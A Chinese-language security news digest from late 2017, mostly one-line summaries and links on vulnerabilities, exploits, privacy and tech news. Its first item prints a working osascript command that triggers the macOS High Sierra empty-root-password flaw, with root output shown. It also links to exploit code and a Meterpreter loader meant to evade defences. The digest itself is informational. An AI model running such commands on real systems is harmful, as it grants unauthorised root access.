资讯类
macOS的#iAmRoot漏洞现在可以通过命令行触发了
$ osascript -e 'do shell script "id" with administrator privileges user name "root" password ""'
uid=0(root) gid=0(wheel) egid=20(staff) groups=0(wheel) [..]
macOS High Sierra - Root提权的exploit
https://www.exploit-db.com/exploits/43201/
微软Edge浏览器发布了Android和iOS版本
HP的Windows遥测服务客户端居然是间谍软件?这篇文章告诉你如何移除它
https://thehackernews.com/2017/11/hp-computers-telemetry-data.html
Google禁用带有锁屏广告的app进入Play Store
https://www.bleepingcomputer.com/news/mobile/google-bans-android-apps-that-show-lockscreen-ads/
Mozilla发布开源语音识别引擎DeepSpeech和语音数据, 错误识别率6.5%,接近人类水平。
语音数据资料:https://voice.mozilla.org/data
代码:https://github.com/mozilla/DeepSpeech
技术类
objective-see对macOS的#iAmRoot漏洞的分析
https://objective-see.com/blog/blog_0x24.html
WebKit – ‘WebCore::Style::TreeResolver::styleForElement’ Use-After-Free
https://www.exploit-db.com/exploits/
CVE-2017-1000405:发现DirtyCow的漏洞没有修复完全,然后通过对补丁的分析,又找出来一个漏洞
https://medium.com/bindecy/huge-dirty-cow-cve-2017-1000405-110eca132de0
PoC:https://github.com/bindecy/HugeDirtyCowPOC
cmsPoc:CMS渗透测试框架
https://github.com/CHYbeta/cmsPoc
7zip CVE-2016-2334 HFS + 代码执行漏洞详细分析
http://blog.talosintelligence.com/2017/11/exploiting-cve-2016-2334.html
逆向YouTube的demonetization算法
https://docs.google.com/document/d/155yNpfR7dGKuN-4rbrvbJLcJkhGa_HqvVuyPK7UEfPo/preview#
基于Windows内核的提权demo
https://blog.xpnsec.com/windows-warbird-privesc/
可绕过客户端和网络对策的Meterpreter loader生成器
https://github.com/hlldz/SpookFlare
演示视频:https://www.youtube.com/watch?v=p_eKKVoEl0o